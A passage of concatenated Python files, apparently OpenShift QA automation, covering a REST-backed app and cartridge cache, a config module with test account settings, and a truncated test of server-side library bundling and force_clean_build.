openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.keys_list()\n if status not in ('OK','ok'):\n raise Exception(\"Unable to initialize CACHE[sshkey] via REST: %s\"%(status))\n\n for key in json.loads(data)['data']:\n key_name = str(key['name'])\n conf[key_name] = {}\n conf[key_name]['type'] = str(key['type'])\n conf[key_name]['fingerprint'] = sshPKeyToFingerprint(str(key['content']))\n return conf\n\n\ndef get_rhlogin(user=None):\n \"\"\"Returns (login, password) from the cache\"\"\"\n if user is None:\n user = _get_default()\n return user.conf['rhlogin']['email'],user.conf['rhlogin']['password']\n\n\ndef get_sshkeys(user=None):\n \"\"\"Returns all ssh keys, which are stored in the cache\"\"\"\n if user is None:\n user = _get_default()\n try:\n return user.conf['sshkey'].keys()\n except Exception as e:\n log.error('Failed to get all sshkeys: %s' % (e))\n raise\n\ndef get_sshkey(key_name = 'default', user=None):\n if user is None:\n user = _get_default()\n try:\n return (user.conf['sshkey'][key_name]['type'], \n user.conf['sshkey'][key_name]['fingerprint'])\n except:\n log.error('Failed to get sshkey %s' % (key_name))\n raise\n\ndef get_app_names(user=None):\n if user is None:\n user = _get_default()\n return user.conf['apps'].keys()\n\ndef get_apps(user=None):\n if user is None:\n user = _get_default()\n return user.conf['apps']\n\ndef get_app_url(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['url']\n\ndef get_app_url_X(app_name, user = None):\n if user is None:\n user = _get_default()\n def closure():\n return get_app_url(app_name, user)\n return closure\n\ndef get_git_url(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['git_url']\n\ndef get_ssh_url(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['git_url'].split('/')[2]\n \n\ndef get_app_uuid(app_name, user = None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n return user.conf['apps'][app_name]['uuid']\n\ndef get_app_uuid_X(app_name, user=None):\n if user is None:\n user = _get_default()\n def closure():\n return get_app_uuid(app_name, user)\n return closure\n\ndef setup_by_rest(user=None):\n \"\"\"\n Returns Dict object with all of the fresh data, given from REST\n - domain\n - apps\n - embedded cartridges\n - ssh keys\n \"\"\"\n conf = {} #we start with empty object\n conf['apps'] = {}\n\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.app_list()\n if status not in ('OK','ok'):\n raise Exception(\"Unable to initialize CACHE via REST: %s\"%(status))\n\n for d in data:\n app_name = d['name']\n conf['apps'][app_name] = {}\n framework = d['framework']\n conf['apps'][app_name]['type'] = framework\n conf['apps'][app_name]['embed'] = {}\n conf['apps'][app_name]['git_url'] = d['git_url']\n #conf['apps'][app_name]['ssh_url'] = d['ssh_url']\n # Hot fix for Bug https://bugzilla.redhat.com/show_bug.cgi?id=950477\n obj = re.match(r'ssh://([^\\s]+)', d['ssh_url'])\n if obj:\n conf['apps'][app_name]['ssh_url'] = str(obj.group(1))\n else:\n conf['apps'][app_name]['ssh_url'] = d['ssh_url']\n conf['apps'][app_name]['uuid'] = d['uuid']\n conf['apps'][app_name]['scalable'] = d['scalable']\n conf['apps'][app_name]['url'] = d['app_url']\n conf['apps'][app_name]['gear_profile'] = d['gear_profile']\n conf['apps'][app_name]['aliases'] = d['aliases']\n # Hot fix fot Bug 956044\n #conf['apps'][app_name]['build_job_url'] = str(d['build_job_url'])\n\n if 'jenkins' in framework:\n (gears, glen) = rest.get_gears(app_name)\n conf['apps'][app_name]['username'] = gears[0]['cartridges'][0]['username']\n conf['apps'][app_name]['password'] = gears[0]['cartridges'][0]['password']\n #HACK due to bug#892878\n if conf['apps'][app_name]['username'] != 'admin':\n f = open('jenkins.password','r')\n credentials = f.read()\n (username, password) = credentials.split(' ')\n conf['apps'][app_name]['username'] = username\n conf['apps'][app_name]['password'] = password\n\n\n (status, data2) = rest.cartridge_list(app_name)\n for cartridge in json.loads(data2)['data']:\n cart_name = cartridge['name']\n emb_cart = {}\n for prop in cartridge['properties']:\n if prop['type'] != 'cart_data':\n continue\n if prop['name'] == 'connection_url':\n obj = re.search(r\"([\\d\\.]+):(\\d+)\", prop['value'])\n if obj:\n emb_cart['url'] = obj.group(1)\n emb_cart['port'] = obj.group(2)\n else:\n emb_cart['url'] = str(prop['value'])\n elif prop['name'] == 'job_url':\n emb_cart['url'] = str(prop['value'])\n emb_cart['job_url'] = str(prop['value'])\n elif prop['name'] == 'database_name':\n emb_cart['database'] = str(prop['value'])\n else:\n # Temporary fix for bug: 903139\n try:\n emb_cart[str(prop['name'])] = str(prop['value'])\n except KeyError:\n print 'Warning: There is no value field for %s of cartridge %s' % (prop['name'], cartridge['name'])\n continue\n if cartridge['name'] == 'rockmongo-1.1':\n emb_cart['username'] = get_embed_info(app_name, 'mongodb-2.2', 'username')\n emb_cart['password'] = get_embed_info(app_name, 'mongodb-2.2', 'password')\n elif cartridge['name'] == 'phpmyadmin-3.4':\n emb_cart['username'] = get_embed_info(app_name, 'mysql-5.1', 'username')\n emb_cart['password'] = get_embed_info(app_name, 'mysql-5.1', 'password')\n\n conf['apps'][app_name]['embed'][cart_name] = emb_cart\n\n conf['sshkey'] = _initial_sshkey()\n conf['domain'] = get_domain_name_()\n return conf\n\n\ndef add_app(app_name, framework, output, user=None):\n '''\n This function no more parses output, but takes info from REST.\n '''\n if user is None:\n user = _get_default()\n user.conf['apps'][app_name] = {}\n user.conf['apps'][app_name]['type'] = framework\n user.conf['apps'][app_name]['embed'] = {}\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.app_get_descriptor(app_name)\n d = json.loads(data)['data']\n user.conf['apps'][app_name]['url'] = str(d['app_url']).split('/')[2]\n user.conf['apps'][app_name]['uuid'] = str(d['uuid'])\n user.conf['apps'][app_name]['git_url'] = str(d['git_url'])\n # Hot fix fot Bug 956044\n #user.conf['apps'][app_name]['build_job_url'] = str(d['build_job_url'])\n if 'jenkins' in framework:\n (gears, glen) = rest.get_gears(app_name)\n user.conf['apps'][app_name]['username'] = gears[0]['cartridges'][0]['username']\n user.conf['apps'][app_name]['password'] = gears[0]['cartridges'][0]['password']\n\n #HACK due to bug#892878\n if user.conf['apps'][app_name]['username'] != 'admin':\n username = re.findall(r\"User:\\s+(\\w+)\", output)[-1]\n password = re.findall(r\"Password:\\s+(\\S+)\", output)[-1]\n user.conf['apps'][app_name]['username'] = username\n user.conf['apps'][app_name]['password'] = password\n write_file('jenkins.password',\"%s %s\"%(username, password))\n\n user.dump_conf()\n return 0\n\ndef remove_app(app_name, user=None):\n if user is None:\n user = _get_default()\n try:\n user.conf['apps'].pop(app_name)\n user.dump_conf()\n return 0\n except:\n log.warning(\"the app doesn't exist in OSConf db.\")\n return 1\n\ndef alter_domain(domain_name, user=None):\n \"\"\"\n We have to reinitialize whole cache!\n It doesn't make sense to update particular fields with new domain\n it's too sensitive.\n \"\"\"\n if user is None:\n user = _get_default()\n user.conf = setup_by_rest()\n user.dump_conf()\n return 0\n\ndef add_sshkey(key_name, key_type, fingerprint, user=None):\n \"\"\"\n Returns 0 if successfully added new key into cache.\n \"\"\"\n if user is None:\n user = _get_default()\n if user.conf['sshkey'].has_key(key_name):\n log.error('A ssh key named %s(%s) already exists.' % (key_name, user.conf['sshkey'][key_name]['fingerprint']))\n return 1\n user.conf['sshkey'][key_name] = {}\n user.conf['sshkey'][key_name]['type'] = key_type\n user.conf['sshkey'][key_name]['fingerprint'] = fingerprint\n user.dump_conf()\n return 0\n\ndef remove_sshkey(key_name, user=None):\n \"\"\"Remove the ssh key from cache only.\n This method should be called only from common, not directly \n @param [String] key_name the name of the key to get from cache\n @return (type, fingerprint) tuple\n \"\"\"\n if user is None:\n user = _get_default()\n if user.conf['sshkey'].has_key(key_name):\n user.conf['sshkey'].pop(key_name)\n user.dump_conf()\n return 0\n else:\n log.error(\"ssh key named %s doesn't exist!\" % (key_name))\n return 1\n\ndef update_sshkey(key_name, key_type, fingerprint, user=None):\n if user is None:\n user = _get_default()\n if user.conf['sshkey'].has_key(key_name):\n user.conf['sshkey'][key_name]['type'] = key_type\n user.conf['sshkey'][key_name]['fingerprint'] = fingerprint\n user.dump_conf()\n return 0\n else:\n log.error(\"ssh key named %s doesn't exist!\" % (key_name))\n return 1\n \ndef update_embed(app_name, op, embed_cart, output, user=None):\n if user is None:\n user = _get_default()\n if cmp(op, 'add') == 0:\n embed_cart = embed_cart.replace('add-','')\n user.conf['apps'][app_name]['embed'][embed_cart] = {}\n\n (user_email, user_passwd) = get_default_rhlogin()\n rest = openshift.Openshift(host=get_instance_ip(), \n user=user_email, \n passwd=user_passwd)\n (status, data) = rest.cartridge_get(app_name, embed_cart)\n emb_cart = {}\n\n for prop in data['data']['properties']:\n if prop['type'] != 'cart_data':\n continue\n if prop['name'] == 'connection_url':\n ssh_url = get_ssh_url(app_name)\n (ret, output) = commands.getstatusoutput('''ssh -o LogLevel=quiet %s \"env | grep -P 'OPENSHIFT_\\w+?_DB_(HOST|PORT)'\"''' % (ssh_url))\n if ret != 0:\n print (re, output)\n print ssh_url\n print \"Failed to get database connection url via env var\"\n else:\n for line in output.splitlines():\n (key, value) = line.split('=')\n if key.find('HOST') != -1:\n emb_cart['url'] = value\n else:\n emb_cart['port'] = value\n '''\n obj = re.search(r\"([\\w\\.\\-]+):(\\d+)\", prop['value'])\n if obj:\n emb_cart['url'] = obj.group(1)\n emb_cart['port'] = obj.group(2)\n else:\n emb_cart['url'] = str(prop['value'])\n '''\n elif prop['name'] == 'database_name':\n emb_cart['database'] = str(prop['value'])\n elif prop['name'] == 'job_url':\n emb_cart['url'] = str(prop['value'])\n else:\n # Temporary fix for bug: 903139\n try:\n #emb_cart[str(prop['name'])] = str(prop['value'])\n emb_cart[str(prop[\"name\"])] = str(prop[\"value\"])\n #emb_cart[prop['name']] = str(prop['value'])\n except KeyError:\n print 'Warning: There is no value field for %s of cartridge %s' % (prop['name'], embed_cart)\n continue\n if embed_cart == 'rockmongo-1.1':\n emb_cart['username'] = get_embed_info(app_name, 'mongodb-2.2', 'username')\n emb_cart['password'] = get_embed_info(app_name, 'mongodb-2.2', 'password')\n # Temporary fix of rockmongo\n emb_cart['url'] = get_app_url(app_name) + '/rockmongo/'\n elif embed_cart == 'jenkins-client-1.4':\n # Hot fix for Bug 956044\n # https://jenkins-dev3184tst.dev.rhcloud.com/job/prl-build\n (status1, data1) = rest.app_get(app_name)\n user.conf['apps'][app_name]['build_job_url'] = data1['build_job_url']\n emb_cart['url'] = data1['build_job_url']\n print emb_cart['url'] \n elif embed_cart == 'phpmyadmin-3.4':\n emb_cart['username'] = get_embed_info(app_name, 'mysql-5.1', 'username')\n emb_cart['password'] = get_embed_info(app_name, 'mysql-5.1', 'password')\n emb_cart['url'] = get_app_url(app_name) + '/phpmyadmin/'\n #finally, update user.conf[...]\n user.conf['apps'][app_name]['embed'][embed_cart] = emb_cart\n elif cmp(op, 'remove') == 0:\n embed_cart = embed_cart.replace('remove-','')\n user.conf['apps'][app_name]['embed'].pop(embed_cart)\n else:\n return 1\n user.dump_conf()\n return 0\n\ndef get_embed_info(app_name, embed_cart, info = None, user=None):\n if user is None:\n user = _get_default()\n if app_name not in user.conf['apps']:\n return 1\n if embed_cart not in user.conf['apps'][app_name]['embed']:\n return 1\n if info == None:\n return user.conf['apps'][app_name]['embed'][embed_cart]\n return user.conf['apps'][app_name]['embed'][embed_cart][info]\n\ndef get_embed_info_X(app_name, embed_cart, info = None, user=None):\n def closure():\n return get_embed_info(app_name, embed_cart, info, user=user)\n return closure\n\ndef get_cache_file():\n \"\"\"\n Returns a default name for cache file.\n \"\"\"\n (user, passwd) = get_default_rhlogin()\n return \"%s/OPENSHIFT_OSConf-%s.dump\" % (get_tmp_dir(), user)\n\n# hot fix for Bug 912255, obtaining DB credentials with env vars instead of REST API\n#def get_db_cred(db_type)\n# db_cred = {\n\n# 'database' : os.environ['OPENSHIFT_APP_NAME'],\n# 'url' : os.environ['OPENSHIFT_' + db_type + '_DB_HOST'],\n# 'port' : os.environ['OPENSHIFT_' + db_type + '_DB_PORT'],\n# 'username' : os.environ['OPENSHIFT_' + db_type + '_DB_USERNAME'],\n# 'password' : os.environ['OPENSHIFT_' + db_type + '_DB_PASSWORD']\n\n# } \n\n# return db_cred\n\n\n\n# debugging\nif __name__ == \"__main__\":\n# initial_conf()\n #print default.conf\n pass\n" }, { "alpha_fraction": 0.6811867356300354, "alphanum_fraction": 0.6948434114456177, "avg_line_length": 34.082645416259766, "blob_id": "2b459fa4118fde4943cd34c5251d1b1a017425a6", "content_id": "e0f137833f933cf3e85e62639a855ee6f30f79b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4247, "license_type": "no_license", "max_line_length": 113, "num_lines": 121, "path": "/automation/open/lib/config.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n##Gloabal varible configuration\n#set gloable varible values\nimport string\nimport ConfigParser\n\nconfigparse = ConfigParser.RawConfigParser()\nconfigparse.read('/home/pruan/work/rhtest/etc/config.cfg')\ntimeoutsec=configparse.get('environment', 'timeoutsec')\npassword=configparse.get('environment', 'password')\nbrowser=configparse.get('environment', 'browser')\nbrowserpath=configparse.get('environment', 'browserpath')\nproxy=configparse.getboolean('environment', 'proxy')\nurl=configparse.get('environment', 'url')\nresultfile=configparse.get('output', 'resultfile')\ndescription=configparse.get('output', 'description')\ntitle=configparse.get('output', 'title')\nconfirm_url_express=configparse.get('environment', 'confirm_url_express')\nconfirm_url_express_yujzhang=configparse.get('environment', 'confirm_url_express_yujzhang')\nconfirm_url_express_yujzhang_invalidkey=configparse.get('environment', 'confirm_url_express_yujzhang_invalidkey')\nconfirm_url_flex=configparse.get('environment', 'confirm_url_flex')\nrestricted_user=configparse.get('environment', 'restricted_user')\ninvalid_user=configparse.get('environment', 'invalid_user')\ntoregister_user=configparse.get('environment', 'toregister_user')\nnew_user=configparse.get('environment', 'new_user')\ngranted_user = [\"[email protected]\",\"123456\"]\ngranted_user2 = [\"[email protected]\",\"111111\"]\nrhn_user = [\"[email protected]\",\"redhat\"]\nexist_domain=configparse.get('environment', 'exist_domain')\nssh_key_file=configparse.get('environment', 'ssh_key_file')\ntochangepwduser = [\"[email protected]\",\"111111\",\"111111\"]\ndomainuser = [\"[email protected]\",\"111111\"]\nlibra_server=configparse.get('environment', 'libra_server')\ndashboard_path=url+\"/app/dashboard\"\ncontrol_panel=url+\"/app/control_panel\"\nregistration_page=url+\"/app/user/new\"\nexpress_registration_page=url+\"/app/user/new/express\"\nflex_registration_page=url+\"/app/user/new/flex\"\nflex_console=url+\"/flex/flex/index.html\"\n\n\n\n\ndef baseconfirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return confirmation_link[:pathstart]\n\ndef email(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return str.replace(str.replace(temp_email,\"%2B\",\"+\"),\"%40\",\"@\")\n\ndef invalidemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+ str.replace(path,temp_email,\"ere\")\n\ndef invalidkey_confirm_url(confirmation_link):\n# process_email_confirm_link(confirmation_link)\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+str.replace(path,key,\"rere\")\n\ndef noemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path[:j-1]\n\ndef nokey_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path[:m+1]+path[j+1:]\n\ndef validemail_confirm_url(confirmation_link):\n pathstart=str.index(confirmation_link,\"app\")\n path=confirmation_link[pathstart-1:]\n i=str.index(path,\"=\")\n j=str.index(path,\"&\") \n k=str.rindex(path,\"=\")\n m=str.index(path,\"?\")\n key=path[i+1:j]\n temp_email=path[k+1:]\n return url+path\n\n\n" }, { "alpha_fraction": 0.5562955141067505, "alphanum_fraction": 0.5663292407989502, "avg_line_length": 49.95701217651367, "blob_id": "4f4e149b66340e0e369af6515ce6ca06bb394bdb", "content_id": "b8dbab37ed03e03edc032a13f8054069f370911f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22524, "license_type": "no_license", "max_line_length": 197, "num_lines": 442, "path": "/automation/open/testmodules/RT/cartridge/server_side_bundling_libs_and_force_clean_build.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'perl'\n if not common.app_types.has_key(self.test_variant):\n raise Exception(\"Invalid/Unknown variable: OPENSHIFT_test_name\")\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types[self.test_variant]\n\n common.env_setup()\n\n # print test case summary\n self.info(\"\"\"\n[US561][rhc-cartridge] PHP: Pear pre-processing\n[US561][rhc-cartridge] Perl: Cpan pre-processing\n[US561][rhc-cartridge] Python: Easy_install pre-processing\n[US561][rhc-cartridge] Ruby: Gem pre-processing\n[US561][rhc-cartridge] Jboss: Maven pre-processing\n[US1107][rhc-cartridge] PHP app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] PERL app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] WSGI app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] RACK app libraries cleanup using force_clean_build marker\n[US1107][rhc-cartridge] JBOSSAS app libraries cleanup using force_clean_build marker\n[US590][Runtime][rhc-cartridge]nodejs app modules cleanup using force_clean_build marker\"\"\")\n\n def finalize(self):\n pass\n \nclass ServerSideBundlingLibsAndForceCleanBuild(OpenShiftTest):\n def test_method(self):\n\n # 1.Create an app\n self.add_step(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0)\n\n # 2.Customize this app\n if self.test_variant == \"php\":\n cmd = \"echo 'channel://pear.php.net/Validate-0.8.4' >%s/deplist.txt && cp -f %s/app_template/php_pear.php %s/php/index.php\" %(self.app_name, WORK_DIR, self.app_name)\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = \"\"\"cd %s && echo \"source 'http://rubygems.org'\\ngem 'rack'\\ngem 'pg'\" > Gemfile && sed -i \"/require 'thread-dump'/ d\" config.ru && bundle install\"\"\" %(self.app_name)\n elif self.test_variant in (\"python\",\"wsgi\"):\n cmd = \"cd %s && sed -i '9s/^#//g' setup.py && cp %s/app_template/wsgi-test.tar.gz ./ && tar xzvf wsgi-test.tar.gz\" %(self.app_name, WORK_DIR)\n elif self.test_variant == \"perl\":\n cmd = \"\"\"cd %s && echo -e '#!/usr/bin/perl\\nprint \"Content-type: text/html\\\\r\\\\n\\\\r\\\\n\";\\nprint \"Welcome to OpenShift\\\\n\";' >perl/index.pl && echo YAML >>deplist.txt\"\"\" %(self.app_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"cd %s && cp %s/app_template/helloworld.tar.gz ./ && tar zxf helloworld.tar.gz\" %(self.app_name, WORK_DIR)\n elif self.test_variant in (\"nodejs\"):\n cmd = \"\"\"cd %s && sed -i '{\\n/dependencies/ a\\\\\\n \"optimist\": \"0.3.4\"\\n}' package.json && sed -i \"4 i var argv = require('optimist').argv;\" server.js\"\"\" % (self.app_name)\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"2.Customize this app\",\n cmd,\n expect_description=\"the git repo should be modified successfully\",\n expect_return=0)\n\n # 3.Git push all the changes\n if self.test_variant == \"php\":\n exp_str = \"install ok: channel://pear.php.net/Validate-0.8.4\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n exp_str = \"Installing pg\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n exp_str = \"Adding Django [\\d.]+ to easy-install.pth\"\n elif self.test_variant == \"perl\":\n exp_str = \"Successfully installed YAML\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n exp_str = \"remote: Downloading: .*javax.*\"\n elif self.test_variant in (\"nodejs\"):\n exp_str = \"remote: npm info install [email protected]\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n self.add_step(\"3.Git push all the changes\",\n \"cd %s && touch x && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"Git push should succeed\",\n expect_return=0,\n expect_str=[exp_str])\n\n # 4. Generate test script\n if self.test_variant == \"php\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/download/Validate-0.8.4.tgz && ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/php/Validate.php\"\n elif self.test_variant in (\"ruby\", \"rack\"):\n cmd_str = \"ls -la ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.8*/gems/pg*\"\n elif self.test_variant in (\"ruby-1.9\"):\n cmd_str = \"ls -la ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.9*/gems/pg*\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}python/virtenv/lib/python2.6/site-packages/Django*\"\n elif self.test_variant == \"perl\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}perl/perl5lib/lib/perl5/YAML\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}.m2/repository/javax\"\n elif self.test_variant in (\"nodejs\"):\n cmd_str = \"ls ${OPENSHIFT_REPO_DIR}node_modules/optimist/\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n\n shell_script = '''#!/bin/bash\nset -x\ncommand=\"%s\"\necho \"$command\"\neval \"$command\"\ntest $? == 0 && echo \"RESULT=0\" || echo \"RESULT=1\"''' %(cmd_str)\n self.add_step(\"4.Write .openshift/action_hooks/deploy\",\n \"echo '%s' >%s/.openshift/action_hooks/deploy && chmod +x %s/.openshift/action_hooks/deploy\" %(shell_script, self.app_name, self.app_name),\n expect_return=0)\n\n # 5.Check the dependencies are installed\n self.add_step(\"5.Check the dependencies are installed vir git hooks\",\n \"cd %s && touch xx && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"Check should PASS\",\n expect_return=0,\n expect_str=[\"RESULT=0\"])\n\n # 6.Check app via browser\n def get_app_url(self, suffix=\"\"):\n def closure():\n return OSConf.get_app_url(self.app_name)+suffix\n return closure\n\n url_suffix=\"\"\n if self.test_variant == \"php\":\n test_html = \"get_correct_number\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n test_html = \"Congratulations on your first Django-powered page\"\n elif self.test_variant == \"perl\":\n test_html = \"Welcome to OpenShift\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n test_html = \"Hello World!\"\n url_suffix = \"/HelloWorld/HelloWorld\"\n elif self.test_variant in (\"nodejs\"):\n test_html = \"Welcome to OpenShift\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\"6.Check app via browser\",\n common.grep_web_page,\n function_parameters=[get_app_url(self, url_suffix), test_html, \"-H 'Pragma: no-cache' -L\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0)\n\n # 7. Using the installed package\n if self.test_variant == \"php\":\n exp_str = \"\"\n unexp_str = \"remote: downloading\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n exp_str = \"remote: Using pg\"\n unexp_str = \"remote: Installing\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n exp_str = \"\"\n unexp_str = \"remote: Downloading\"\n elif self.test_variant == \"perl\":\n exp_str = \"\"\n unexp_str = \"remote: Fetching\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n exp_str = \"\"\n unexp_str = \"remote: Downloading\"\n elif self.test_variant in (\"nodejs\"):\n exp_str = \"\"\n unexp_str = \"remote: npm http GET.*optimist\"\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\"7. Re-using the installed libs, no new installation\",\n \"cd %s && touch xxx && git add . && git commit -am t && git push\" %(self.app_name),\n expect_description=\"Check should PASS\",\n expect_return=0,\n expect_str=[exp_str],\n unexpect_str=[unexp_str])\n\n # 8. More test for rack app\n if self.test_variant in ( \"rack\",\"ruby\", \"ruby-1.9\"):\n self.add_step(\n \"8. Edit Gemfile to add another gem we want to install,\",\n '''cd %s && echo \"gem 'rhc'\" >>Gemfile ; bundle check ; bundle install ; sed -i \"s/rhc \\(.*\\)/rhc \\(0.71.2\\)/g\" Gemfile.lock''' %(self.app_name),\n expect_return=0)\n\n self.add_step(\n \"9. Re-using the installed libs, and install new libs\",\n \"cd %s && git add . && git commit -am t && git push\" %(self.app_name),\n expect_return=0,\n expect_str=[\"remote: Using pg\", \"remote: Installing rhc\"])\n else:\n self.info(\"skip step 8\")\n self.info(\"skip step 9\")\n\n\n # 10. Touch a empty force_clean_build file in your local git repo\n self.add_step(\"10. Touch a empty force_clean_build file in your local git repo.\",\n \"touch %s/.openshift/markers/force_clean_build\" %(self.app_name),\n expect_description=\"Successfully touched force_clean_build\",\n expect_return=0)\n\n # 11. Remove libraries\n if self.test_variant == \"php\":\n cmd = \"echo '' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No denpendency need to be remove for jbossas app'\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n cmd = \"cd %s && sed -i '$d' Gemfile && bundle check\" %(self.app_name)\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd = \"cd %s && sed -i '9s/^/#/g' setup.py\" %(self.app_name)\n elif self.test_variant == \"perl\":\n cmd = \"echo '' > %s/deplist.txt\" %(self.app_name)\n elif self.test_variant in (\"nodejs\"):\n cmd = \"cd %s && sed -i '{/optimist/ d}' package.json\" % (self.app_name)\n else:\n return self.failed(\"%s failed: Invalid test_variant\" % self.__class__.__name__)\n self.add_step(\"11. Remove libraries dependency\",\n cmd,\n expect_description=\"Modification succeed\",\n expect_return=0)\n\n # 12. re-write .openshift/action_hooks/deploy\n if self.test_variant == \"php\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/download/Validate-0.8.4.tgz || ls ${OPENSHIFT_HOMEDIR}php/phplib/pear/pear/php/Validate.php\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"ruby\", \"rack\"):\n cmd_str = \"ls ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.8*/gems/rhc*\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"ruby-1.9\"):\n cmd_str = \"ls ${OPENSHIFT_REPO_DIR}vendor/bundle/ruby/1.9*/gems/rhc*\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant == \"perl\":\n cmd_str = \"ls ${OPENSHIFT_HOMEDIR}perl/perl5lib/lib || ls ~/.cpanm/work\"\n cmd = \"\"\"sed -i 's#command=\"ls.*\"#command=\"%s\"#g' %s/.openshift/action_hooks/deploy\"\"\" %(cmd_str, self.app_name)\n elif self.test_variant in (\"python\", \"wsgi\"):\n cmd = \"echo 'No need to re-write for wsgi app'\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd = \"echo 'No need to re-write for jbossas app'\"\n elif self.test_variant in 